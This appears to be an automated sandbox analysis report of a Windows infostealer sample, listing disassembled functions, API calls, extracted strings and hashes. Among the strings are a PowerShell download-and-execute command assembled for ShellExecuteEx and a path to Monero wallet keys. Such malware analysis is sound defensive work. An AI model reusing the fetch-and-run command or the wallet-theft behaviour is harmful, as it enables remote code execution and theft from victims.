                                      • RegCloseKey.ADVAPI32(00000000), ref: 0053848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00538499
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      • RegQueryValueExA.ADVAPI32(00000000,00F1E200,00000000,000F003F,?,00000400), ref: 005384EC
                                      • lstrlen.KERNEL32(?), ref: 00538501
                                      • RegQueryValueExA.ADVAPI32(00000000,00F1E458,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00540B34), ref: 00538599
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00538608
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0053861A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 82b52549a7c7b60c2f17558fcde4d78be32d443e3c707a73d904f234dc287075
                                      • Instruction ID: 858ecd55003abdd5abe0fd140faf7e36b372b282867361de524d04e731f11ba5
                                      • Opcode Fuzzy Hash: 82b52549a7c7b60c2f17558fcde4d78be32d443e3c707a73d904f234dc287075
                                      • Instruction Fuzzy Hash: 7221E9B1910218ABDB24DF54DC85FE9B7B8FB88704F00C5D8E60AA6180DF75AA85CFD4
                                      Function 00537690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005376A4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 005376AB
                                      • RegOpenKeyExA.ADVAPI32(80000002,00F0BE88,00000000,00020119,00000000), ref: 005376DD
                                      • RegQueryValueExA.ADVAPI32(00000000,00F1E308,00000000,00000000,?,000000FF), ref: 005376FE
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00537708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: e8244cb356235325f84e2ad29ce25e3cecb6dfa34cc961c404af390bb3b81309
                                      • Instruction ID: b424a2e32be85e05935a758186aef0ce71ff8756421b9ddde032dcd442b5a9d3
                                      • Opcode Fuzzy Hash: e8244cb356235325f84e2ad29ce25e3cecb6dfa34cc961c404af390bb3b81309
                                      • Instruction Fuzzy Hash: F20162B5A04309BBDB10DBE4DD49FADBBB8EB48701F108454FA06E7291E6B89900CF55
                                      Function 00537720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537734
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0053773B
                                      • RegOpenKeyExA.ADVAPI32(80000002,00F0BE88,00000000,00020119,005376B9), ref: 0053775B
                                      • RegQueryValueExA.ADVAPI32(005376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0053777A
                                      • RegCloseKey.ADVAPI32(005376B9), ref: 00537784
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: b49f8f19f39d06d5270fa68ccb923950efb747e499f6c562790e5295301e8829
                                      • Instruction ID: 10adab060765213026400a613178a6949b5a4fbc19240f0c1969a5a703478e43
                                      • Opcode Fuzzy Hash: b49f8f19f39d06d5270fa68ccb923950efb747e499f6c562790e5295301e8829
                                      • Instruction Fuzzy Hash: 1F0117B5A40309BBDB10DFE4DC4AFAEB7B8FB48705F108555FA06B7281D6B469008F55
                                      Function 005392E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(:S,80000000,00000003,00000000,00000003,00000080,00000000,?,00533AEE,?), ref: 005392FC
                                      • GetFileSizeEx.KERNEL32(000000FF,:S), ref: 00539319
                                      • CloseHandle.KERNEL32(000000FF), ref: 00539327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID: :S$:S
                                      • API String ID: 1378416451-1984518138
                                      • Opcode ID: e3da8dea96df9764e10d520508190f8b8172e91d01ee48ec97a72d96ca44e81c
                                      • Instruction ID: 7b3111305f227f90573a43054e00242234df0b0dc19f0a4fb591813bcecbcbff
                                      • Opcode Fuzzy Hash: e3da8dea96df9764e10d520508190f8b8172e91d01ee48ec97a72d96ca44e81c
                                      • Instruction Fuzzy Hash: 25F03CB5E44308BBDB10DBB4DC49B9E7BB9FB48710F10CA54F652A72C0D6B496018F45
                                      Function 005299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                      • ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                      • LocalFree.KERNEL32(0052148F), ref: 00529A90
                                      • CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: e0b5e1fac2b861129e7abe8a037fb76c978f58321743746ce1ea4fd5b871c3fb
                                      • Instruction ID: cea5e1b8ad5f5f1ca015e30f82c0196c534ca68ae8d43a1ec27ac8c4c38d3abb
                                      • Opcode Fuzzy Hash: e0b5e1fac2b861129e7abe8a037fb76c978f58321743746ce1ea4fd5b871c3fb
                                      • Instruction Fuzzy Hash: 9931F6B4A0030AEFDB14CF94D985BAE7BB5FF49340F108158E912A7390D779AA41CFA1
                                      Function 00534780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,00F1E620), ref: 005347DB
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534801
                                      • lstrcat.KERNEL32(?,?), ref: 00534820
                                      • lstrcat.KERNEL32(?,?), ref: 00534834
                                      • lstrcat.KERNEL32(?,00F0BA18), ref: 00534847
                                      • lstrcat.KERNEL32(?,?), ref: 0053485B
                                      • lstrcat.KERNEL32(?,00F1DD00), ref: 0053486F
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 00538D90: GetFileAttributesA.KERNEL32(00000000,?,00521B54,?,?,0054564C,?,?,00540E1F), ref: 00538D9F
                                        • Part of subcall function 00534570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00534580
                                        • Part of subcall function 00534570: RtlAllocateHeap.NTDLL(00000000), ref: 00534587
                                        • Part of subcall function 00534570: wsprintfA.USER32 ref: 005345A6
                                        • Part of subcall function 00534570: FindFirstFileA.KERNEL32(?,?), ref: 005345BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: aabb77132c2b39c38188414510cc63b6700d378ead746f112aa5759026f6c54a
                                      • Instruction ID: d3669d0de800f33407bb4faeafc2589681ddb650e3542f3b99ad5239c030e69c
                                      • Opcode Fuzzy Hash: aabb77132c2b39c38188414510cc63b6700d378ead746f112aa5759026f6c54a
                                      • Instruction Fuzzy Hash: E13152B290031967CB15F7B0DC89EED777CBB98700F404589B356A6081EEB4E6898F95
                                      Function 00532C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00532D85
                                      Strings
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00532D04
                                      • ')", xrefs: 00532CB3
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00532CC4
                                      • <, xrefs: 00532D39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 610f82fb97dac79e52c7fae4d070780ab9895b85e113044212ec6eb4fbc48c8e
                                      • Instruction ID: 4f44a34fc5773282638284fee69b1729fe1652c26ca508964681ee690bd75723
                                      • Opcode Fuzzy Hash: 610f82fb97dac79e52c7fae4d070780ab9895b85e113044212ec6eb4fbc48c8e
                                      • Instruction Fuzzy Hash: CC41BE71C10209AADB14EFA0C89ABEDBF78BF54300F504119F156B7192EF746A4ACF92
                                      Function 00529E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00529F41
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$AllocLocal
                                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                      • API String ID: 4171519190-1096346117
                                      • Opcode ID: 3e5da4673ef2e507b728aff89dd0c2809efce9518ae7224680abb54a8f4c34dc
                                      • Instruction ID: af849567e1212cef672594ffceb929b88b00993a5a7b5455fe150580f2aeb5a5
                                      • Opcode Fuzzy Hash: 3e5da4673ef2e507b728aff89dd0c2809efce9518ae7224680abb54a8f4c34dc
                                      • Instruction Fuzzy Hash: EC614F70A00259ABDB24EFA4DC9AFEE7B75BF85304F008018F90A5B1D1EB746A05CB52
                                      Function 005340B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,00F1DA60,00000000,00020119,?), ref: 005340F4
                                      • RegQueryValueExA.ADVAPI32(?,00F1E4A0,00000000,00000000,00000000,000000FF), ref: 00534118
                                      • RegCloseKey.ADVAPI32(?), ref: 00534122
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534147
                                      • lstrcat.KERNEL32(?,00F1E4B8), ref: 0053415B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 690832082-0
                                      • Opcode ID: b08a1a7e173fffb7e48f3dd64265ea08af23bdecdccb4407394d4dd0c7de3bd0
                                      • Instruction ID: 700298dc65e6c624866b10232899529fa00ade3398a91f28dbb78099acfe8a58
                                      • Opcode Fuzzy Hash: b08a1a7e173fffb7e48f3dd64265ea08af23bdecdccb4407394d4dd0c7de3bd0
                                      • Instruction Fuzzy Hash: 2F418D7690020877DB14EBA0EC5AFFE773DBB98300F008558F61657181EAB55B888FD2
                                      Function 00537E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537E37
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537E3E
                                      • RegOpenKeyExA.ADVAPI32(80000002,00F0C3C8,00000000,00020119,?), ref: 00537E5E
                                      • RegQueryValueExA.ADVAPI32(?,00F1DC20,00000000,00000000,000000FF,000000FF), ref: 00537E7F
                                      • RegCloseKey.ADVAPI32(?), ref: 00537E92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
